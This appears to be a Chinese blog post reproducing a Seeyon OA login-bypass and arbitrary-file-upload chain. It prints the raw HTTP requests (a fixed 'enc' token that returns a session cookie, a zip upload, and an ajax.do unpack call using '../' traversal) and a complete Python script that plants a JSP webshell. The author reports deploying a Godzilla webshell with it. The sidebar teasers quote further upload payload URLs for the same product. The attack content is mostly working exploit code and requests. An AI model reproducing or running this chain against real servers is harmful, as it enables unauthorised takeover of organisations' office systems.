致远漏洞(登陆绕过+任意文件上传)

最新推荐文章于 2026-04-23 12:48:13 发布
原创 最新推荐文章于 2026-04-23 12:48:13 发布 · 6k 阅读 · 25
标签
#java #web安全 #网络安全

漏洞复现

1.获得cookie

POST /seeyon/thirdpartyController.do HTTP/1.1
Host: 192.168.1.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

在这里插入图片描述
224791DA45D8CCAC687C1D40EB11A1AC
9D5488963545F408D71933161CCCAF53
每次请求都会得到一个cookie值,都可以用,如下:在这里插入图片描述
失败的cookie如下:在这里插入图片描述
2.上传zip文件

POST /seeyon/fileUpload.do?method=processUpload&maxSize= HTTP/1.1
Host: 192.168.1.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=224791DA45D8CCAC687C1D40EB11A1AC
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------1416682316313
Content-Length: 1079

-----------------------------1416682316313
Content-Disposition: form-data; name="type"


-----------------------------1416682316313
Content-Disposition: form-data; name="extensions"


-----------------------------1416682316313
Content-Disposition: form-data; name="applicationCategory"


-----------------------------1416682316313
Content-Disposition: form-data; name="destDirectory"


-----------------------------1416682316313
Content-Disposition: form-data; name="destFilename"


-----------------------------1416682316313
Content-Disposition: form-data; name="maxSize"


-----------------------------1416682316313
Content-Disposition: form-data; name="isEncrypt"


-----------------------------1416682316313
Content-Disposition: form-data; name="file1"; filename="123.zip"
Content-Type: application/x-zip-compressed

zip文件
-----------------------------1416682316313--

注意这里zip文件直接burp右键paste from file放进去即可
在这里插入图片描述
在这里插入图片描述
这里压缩文件如上

3.解压压缩文件

POST /seeyon/ajax.do HTTP/1.1
Host: 192.168.1.9 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=224791DA45D8CCAC687C1D40EB11A1AC
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2024-02-23","-8399929361113331102"]

在这里插入图片描述
可以看到报错找不到指定文件,是因为我们压缩包中没有带layout.xml,其必须存在否则在利用解压漏洞时会解压失败空内容即可

注意上传目录:在这里插入图片描述
然后我重新生成zip文件在这里插入图片描述
再次解压,在这里插入图片描述
但是访问不到,应该这里有问题
在这里插入图片描述
在这里插入图片描述
因为解压出来的目录都为空,直接用下面脚本吧

这里利用脚本来进行攻击利用
223.py

# coding:utf-8
import time
import requests
import re
import sys
import random
import zipfile


la = {
   
   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
           'Content-Type': 'application/x-www-form-urlencoded'}

def generate_random_str(randomlength=16):
  random_str = ''
  base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
  length = len(base_str) - 1
  for i in range(randomlength):
    random_str += base_str[random.randint(0, length)]
  return random_str

mm = generate_random_str(8)

webshell_name1 = mm+'.jsp'
webshell_name2 = '../'+webshell_name1

def file_zip():
    shell = 'test'   ## 替换shell内容
    zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
    zf.writestr('layout.xml', "")
    zf.writestr(webshell_name2, shell)


def Seeyon_Getshell(urllist):

    url = urllist+'/seeyon/thirdpartyController.do'
    post = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1"
    response = requests.post(url=url, data=post, headers=la)
    if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():
        cookie = response.cookies
        cookies = requests.utils.dict_from_cookiejar(cookie)
        jsessionid = cookies['JSESSIONID']
        file_zip()
        print( '获取cookie成功---->> '+jsessionid)
        fileurl = urllist+'/seeyon/fileUpload.do?method=processUpload&maxSize='
        headersfile = {
   
   'Cookie': "JSESSIONID=%s" % jsessionid}
        post = {
   
   'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver': "false", "type": '0',
                'isEncrypt': "0"}
        file = [('file1', ('test.png', open(mm+'.zip', 'rb'), 'image/png'))]
        filego = requests.post(url=fileurl,data=post,files=file, headers=headersfile)
        time.sleep(2)
    else:
        print('获取cookie失败')
        exit()
    if filego.text:
        fileid1 = re.findall('fileurls=fileurls\+","\+\'(.+)\'', filego.text, re.I)
        fileid = fileid1[0]
        if len(fileid1) == 0:
            print('未获取到文件id可能上传失败!')
        print('上传成功文件id为---->>:'+fileid)
        Date_time = time.strftime('%Y-%m-%d')
        headersfile2 = {'Content-Type': 'application/x-www-form-urlencoded','Cookie': "JSESSIONID=%s" % jsessionid}
        getshellurl = urllist+'/seeyon/ajax.do'
        data = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + Date_time + '%22%2C%22' + fileid + '%22%5D'
        getshell = requests.post(url=getshellurl,data=data,headers=headersfile2)
        time.sleep(1)
        webshellurl1 = urllist + '/seeyon/common/designer/pageLayout/' + webshell_name1
        shelllist = requests.get(url=webshellurl1)
        if shelllist.status_code == 200:
            print('利用成功webshell地址:'+webshellurl1)
        else:
            print('未找到webshell利用失败')



def main():
    if (len(sys.argv) == 2):
        url = sys.argv[1]
        Seeyon_Getshell(url)
    else:
        print("python3 Seeyon_Getshell.py http://xx.xx.xx.xx")

if __name__ == '__main__':
    main()

python.exe 223.py http://192.168.1.2
在这里插入图片描述
在这里插入图片描述
然后我们在本地找找文件上传目录在这里插入图片描述
因为脚本中加了…/,所以就在pageLayout根目录,如果不加…/会在2853431203184658860文件夹下面,
在这里插入图片描述
可以看到layout只需要有这个文件就行,0kb就行,所以我们上面手动的操作没问题,但是不知道哪有问题

我们改掉shell内容,为哥斯拉jsp在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到漏洞利用成功

漏洞原理

任意账户登录分析

首先搜索thirdpartyController.do接口
在这里插入图片描述
然后找到ThirdpartyController类路径
在这里插入图片描述
可以根据路由接口找到对应配置文件中类文件的映射找到类路径
在这里插入图片描述
根据exp知道调用了access方法

@NeedlessCheckLogin
public ModelAndView access(HttpServletRequest request, HttpServletResponse response) throws E
最低0.47元/天 解锁文章
致远OA-ajax.do未授权文件上传漏洞1
08-08
近日,致远OA ajaxAction 文件上传漏洞利用代码披露,由于致远OA旧版本中某些接口存在未授权访问,以及部分函数过滤不足,攻击者通过构造恶意请求,可在无
技术分享 从致远OA-ajax
m0_57473261的博客
04-12 1821
根据漏洞复现部分,GET请求/seeyon/thirdpartyController.do.css/…POST数据进行任意文件上传,需要带上Content-Type: application/x-www-form-urlencoded,根据返回内容是否包含message、code和details,并且排除返回内容包含-1(上传失败,返回值的code为-1)判断是否上传成功。填写完测试数据后,在自定义PoC的右上角有个"单ip扫描"选项,输入ip:port,进行单ip扫描,查看定义的测试选项逻辑是否正确。
致远OA任意文件上传
课嗨教育的专栏
05-10 2283
1)通过请求直接获取管理员权限cookie 2)通过上传一个压缩文件,调用接口进行文件在解压时会利用解压过程的漏洞利用获取webshell def seeyon_new_rce(targeturl): orgurl=targeturl #通过请求直接获取管理员权限cookie targeturl=orgurl+'seeyon/thirdpartyController.do' post='method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmc
Testbench高级用法:如何测试复杂的Laravel包功能
最新发布
gitblog_07253的博客
04-23 779
Testbench是Laravel官方推荐的包开发测试工具,它提供了完整的Laravel环境模拟,让开发者能够轻松测试各种复杂的包功能。本文将分享Testbench的高级使用技巧,帮助你构建更健壮的Laravel包测试体系。 ## 为什么选择Testbench进行Laravel包测试? Laravel包开发需要模拟完整的框架环境,包括服务容器、数据库连接和配置系统。Testbench通过预配置
致远OA敏感信息泄露漏洞合集(含批量检测POC)
今天是几号的博客
03-21 1万+
用友致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题,是组织管理的最佳实践。产品系列: A3、A6、A8品牌: 用友对象: 微型、小型企业、企业部门级。
技术分享 | 从致远OA-ajax.do任意文件上传漏洞复现到EXP编写
m0_46699477的博客
01-27 5734
前言: 最近网上爆出致远OA ajax.do登录绕过任意文件上传漏洞,影响部分旧版致远OA版本(致远OA V8.0,致远OA V7.1、V7.1SP1,致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3,致远OA V6.0、V6.1SP1、V6.1SP2,致远OA V5.x,致远OA G6)。互联网上已经有基于Python的EXP,为了更好的发挥Goby的作用,尝试在Goby上编写EXP工具。 0x001 漏洞复现 漏洞复现主要分以下三个部分: 1.1 未授权访问 参考unicodeS.
致远OA-ajax.do任意文件上传漏洞
MD@@nr丫卡uer
01-14 1万+
致远OA-ajax.do任意文件上传漏洞 漏洞描述 致远OA是一套办公协同管理软件。近日,奇安信CERT监测到致远OA的相关漏洞信息。由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远OA官方已针对该漏洞提供补丁。鉴于漏洞危害较大,建议用户尽快应用补丁更新。 漏洞影响版本 致远OA V8.0 致远OA V7.1、V7.1SP1 致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3 致远OA V6
致远OA漏洞复现
热门推荐
混子
12-31 5万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
2021-01-18
weixin_45959257的博客
01-18 4492
致远OA任意文件上传漏洞 漏洞原理 致远OA是一套办公协同管理软件。近日,奇安信CERT监测到致远OA的相关漏洞信息。由于致远OA旧版本某些接口存在未授权访问,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。 修复方法 下载致远OA的最新补丁 漏洞复现 1、构建判断漏洞是否存在 http://xxx.xxx.xxx.xxx/seeyon/thirdpartyController.do.css/..;/ajax.do 如下图的结果则说明可能存在,但只是可能,要进一步操作才能确定
致远(用友)OA或M1 漏洞复现
ccz4854的博客
08-09 6002
致远OA通过发送特殊请求获取session,在通过文件上传接口上传特殊构造的恶意压缩包,并通过解压为webshell控制服务器。
致远OA任意管理员登陆漏洞分析
swordheart的博客
07-08 4838
随着中国最大的安全产品性能检测以及人体体能极限挑战活动的到来,各路大佬都八仙过海各显神通。同时大量的0day被公开,排除那些被辟谣的,还有很多值得学习的漏洞致远这是个组合漏洞,首先任意管理员登陆,然后后台getshell。因为前台漏洞相对来说危害较高,这里着重分析下前台这个漏洞致远oa使用spring的自动装配,通过在xml文件中搜索漏洞url中的,可以快速定位到漏洞类。 根据exp找到存在问题的方法。 找到该方法后基本上可以一眼看到漏洞点了,在该方法的最下方,这里的memberId是可控的。首先通过
致远OA文件上传漏洞(含批量检测POC)
Innocence_0的博客
07-07 2549
漏洞描述* 漏洞描述文章内容仅供学习参考请勿用于非法用途。
【nday】HVV 致远OA漏洞合集
伏一
05-27 1万+
然后调用未授权的文件上传接口上传webshell文件,webshell地址: /seeyon/apps_res/addressbook/images/config.jspx。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。app="致远互联-OA" && title="V8.0SP2"body="yyoa" && app="致远互联-OA"title="致远A8+协同管理软件.A6"
致远OA ajax.do 任意文件上传 (CNVD-2021-01627) 漏洞复现
Boom!脑洞大爆炸的博客
11-11 4398
致远OA ajax.do 任意文件上传 (CNVD-2021-01627) 漏洞复现
致远OA ajaxAction formulaManager 文件上传漏洞
thelostworld
01-14 6099
致远OA ajaxAction formulaManager 文件上传漏洞 一、漏洞描述 致远OA是一套办公协同软件。近日,阿里云应急响应中心监控到致远OA ajaxAction 文件上传漏洞利用代码披露。由于致远OA旧版本某些ajax接口存在未授权访问,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。 ​ 二、影响版本 致远OA V8.0、V8.0SP1 致远OA V7.1、V7.1SP1 三、漏洞复现 exp: POST/seeyon/autoinst..
致远OA-ajax.do未授权文件上传漏洞复现
qq_52469895的博客
04-11 1万+
打开网站 任何测试它有没有未授权文件上传 http://xxx/seeyon/thirdpartyController.do.css/…;/ajax.do 通过抓取数据包,可以看到如下的数据请求和返回结构: 返回状态404返回notfound 然后直接poc这个jspx的马是在网上找到 http://x.x.x.x/seeyon/autoinstall.do/..;/ajax.do?method=ajaxAction&managerName=formulaManage
2023 致远OA-任意用户密码重置漏洞
weixin_45908624的博客
09-14 4497
致远OA 短信验证码绕过重置密码漏洞
ajax的auto是true,致远OA ajax.do未授权上传/seeyon/autoinstall.do.css(莫名其妙的坑记录一下) CNVD-2021-01627...
weixin_39683176的博客
08-05 5229
0x01打seeyon的站用ajax.do未授权上传的时候遇见了神奇的事情,先上payload吧,下面shell的路径为/seeyon/bak0.jspx,哥斯拉默认密码和密钥。POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompres...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值